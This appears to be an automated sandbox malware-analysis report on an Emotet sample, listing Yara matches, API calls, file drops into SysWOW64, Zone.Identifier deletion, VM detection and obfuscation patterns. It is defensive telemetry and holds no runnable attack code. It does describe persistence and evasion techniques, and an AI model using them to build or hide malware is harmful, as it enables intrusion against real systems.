Source: svchost.exe, 0000000C.00000002.308238435.000001A00424E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: dot3hc.exe, 00000003.00000002.483182974.000000000064A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: dot3hc.exe, 00000003.00000002.483182974.000000000064A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000003.00000002.484278022.0000000002171000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220853815.0000000002631000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220137105.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.483728370.00000000020E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220808157.00000000025E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482905413.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.23cf697d5faf11a3ffdd271e1d301173.exe.2630000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.dot3hc.exe.2170000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02172730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey, 3_2_02172730
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02172730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey, 3_2_02172730

System Summary:

barindex
Creates files inside the system directory
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File created: C:\Windows\SysWOW64\cleanmgr\ Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File created: C:\Windows\SysWOW64\cleanmgr\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File deleted: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File deleted: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_004098D7 0_2_004098D7
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00408974 0_2_00408974
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02638180 0_2_02638180
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02631C70 0_2_02631C70
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02637590 0_2_02637590
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212380E 0_2_0212380E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02129D1E 0_2_02129D1E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212912E 0_2_0212912E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_004098D7 0_2_004098D7
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00408974 0_2_00408974
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02638180 0_2_02638180
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02631C70 0_2_02631C70
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02637590 0_2_02637590
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212380E 0_2_0212380E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02129D1E 0_2_02129D1E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212912E 0_2_0212912E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_004098D7 3_2_004098D7
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00408974 3_2_00408974
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02178180 3_2_02178180
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02171C70 3_2_02171C70
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02177590 3_2_02177590
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: String function: 00408928 appears 53 times
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: String function: 00408928 appears 53 times
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: String function: 00408928 appears 53 times
Sample file is different than original file name gathered from version info
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 23cf697d5faf11a3ffdd271e1d301173.exe
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 23cf697d5faf11a3ffdd271e1d301173.exe
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221055432.00000000027E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 23cf697d5faf11a3ffdd271e1d301173.exe
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 23cf697d5faf11a3ffdd271e1d301173.exe
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 23cf697d5faf11a3ffdd271e1d301173.exe
Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221055432.00000000027E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 23cf697d5faf11a3ffdd271e1d301173.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: classification engine Classification label: mal68.troj.evad.winEXE@19/13@0/3
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 0_2_02638730
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 0_2_02638730
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02174CA0 Process32NextW,Process32NextW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindCloseChangeNotification, 3_2_02174CA0
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02174CA0 Process32NextW,Process32NextW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindCloseChangeNotification, 3_2_02174CA0
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap, 0_2_02635060
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap, 0_2_02635060
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4660:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4660:120:WilError_01
Source: 23cf697d5faf11a3ffdd271e1d301173.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 23cf697d5faf11a3ffdd271e1d301173.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe 'C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Process created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe 'C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Process created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00406030 push eax; ret 0_2_0040604E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00408963 push ecx; ret 0_2_00408973
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040AB90 push eax; ret 0_2_0040ABA4
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040AB90 push eax; ret 0_2_0040ABCC
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635E70 push ecx; mov dword ptr [esp], 00008D73h 0_2_02635E71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635E40 push ecx; mov dword ptr [esp], 0000AEA2h 0_2_02635E41
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635EA0 push ecx; mov dword ptr [esp], 00007473h 0_2_02635EA1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635F70 push ecx; mov dword ptr [esp], 000084ADh 0_2_02635F71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635F20 push ecx; mov dword ptr [esp], 0000E2ADh 0_2_02635F21
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635FB0 push ecx; mov dword ptr [esp], 0000460Eh 0_2_02635FB1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D70 push ecx; mov dword ptr [esp], 00008067h 0_2_02635D71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D30 push ecx; mov dword ptr [esp], 00002C7Ch 0_2_02635D31
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D00 push ecx; mov dword ptr [esp], 000021B4h 0_2_02635D01
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635DE0 push ecx; mov dword ptr [esp], 000025AAh 0_2_02635DE1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635DA0 push ecx; mov dword ptr [esp], 000036B8h 0_2_02635DA1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127A0E push ecx; mov dword ptr [esp], 00008D73h 0_2_02127A0F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127A3E push ecx; mov dword ptr [esp], 00007473h 0_2_02127A3F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127ABE push ecx; mov dword ptr [esp], 0000E2ADh 0_2_02127ABF
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127B0E push ecx; mov dword ptr [esp], 000084ADh 0_2_02127B0F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127B4E push ecx; mov dword ptr [esp], 0000460Eh 0_2_02127B4F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212789E push ecx; mov dword ptr [esp], 000021B4h 0_2_0212789F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021278CE push ecx; mov dword ptr [esp], 00002C7Ch 0_2_021278CF
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212790E push ecx; mov dword ptr [esp], 00008067h 0_2_0212790F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212793E push ecx; mov dword ptr [esp], 000036B8h 0_2_0212793F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212797E push ecx; mov dword ptr [esp], 000025AAh 0_2_0212797F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021279DE push ecx; mov dword ptr [esp], 0000AEA2h 0_2_021279DF
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00406030 push eax; ret 0_2_0040604E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00408963 push ecx; ret 0_2_00408973
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040AB90 push eax; ret 0_2_0040ABA4
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040AB90 push eax; ret 0_2_0040ABCC
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635E70 push ecx; mov dword ptr [esp], 00008D73h 0_2_02635E71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635E40 push ecx; mov dword ptr [esp], 0000AEA2h 0_2_02635E41
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635EA0 push ecx; mov dword ptr [esp], 00007473h 0_2_02635EA1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635F70 push ecx; mov dword ptr [esp], 000084ADh 0_2_02635F71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635F20 push ecx; mov dword ptr [esp], 0000E2ADh 0_2_02635F21
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635FB0 push ecx; mov dword ptr [esp], 0000460Eh 0_2_02635FB1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D70 push ecx; mov dword ptr [esp], 00008067h 0_2_02635D71
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D30 push ecx; mov dword ptr [esp], 00002C7Ch 0_2_02635D31
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635D00 push ecx; mov dword ptr [esp], 000021B4h 0_2_02635D01
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635DE0 push ecx; mov dword ptr [esp], 000025AAh 0_2_02635DE1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02635DA0 push ecx; mov dword ptr [esp], 000036B8h 0_2_02635DA1
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127A0E push ecx; mov dword ptr [esp], 00008D73h 0_2_02127A0F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127A3E push ecx; mov dword ptr [esp], 00007473h 0_2_02127A3F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127ABE push ecx; mov dword ptr [esp], 0000E2ADh 0_2_02127ABF
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127B0E push ecx; mov dword ptr [esp], 000084ADh 0_2_02127B0F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02127B4E push ecx; mov dword ptr [esp], 0000460Eh 0_2_02127B4F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212789E push ecx; mov dword ptr [esp], 000021B4h 0_2_0212789F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021278CE push ecx; mov dword ptr [esp], 00002C7Ch 0_2_021278CF
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212790E push ecx; mov dword ptr [esp], 00008067h 0_2_0212790F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212793E push ecx; mov dword ptr [esp], 000036B8h 0_2_0212793F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212797E push ecx; mov dword ptr [esp], 000025AAh 0_2_0212797F
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021279DE push ecx; mov dword ptr [esp], 0000AEA2h 0_2_021279DF
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00406030 push eax; ret 3_2_0040604E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00408963 push ecx; ret 3_2_00408973
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_0040AB90 push eax; ret 3_2_0040ABA4
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_0040AB90 push eax; ret 3_2_0040ABCC
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02175E40 push ecx; mov dword ptr [esp], 0000AEA2h 3_2_02175E41

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Executable created and started: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Executable created and started: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe PE file moved: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe PE file moved: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File opened: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File opened: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap, 0_2_02635060
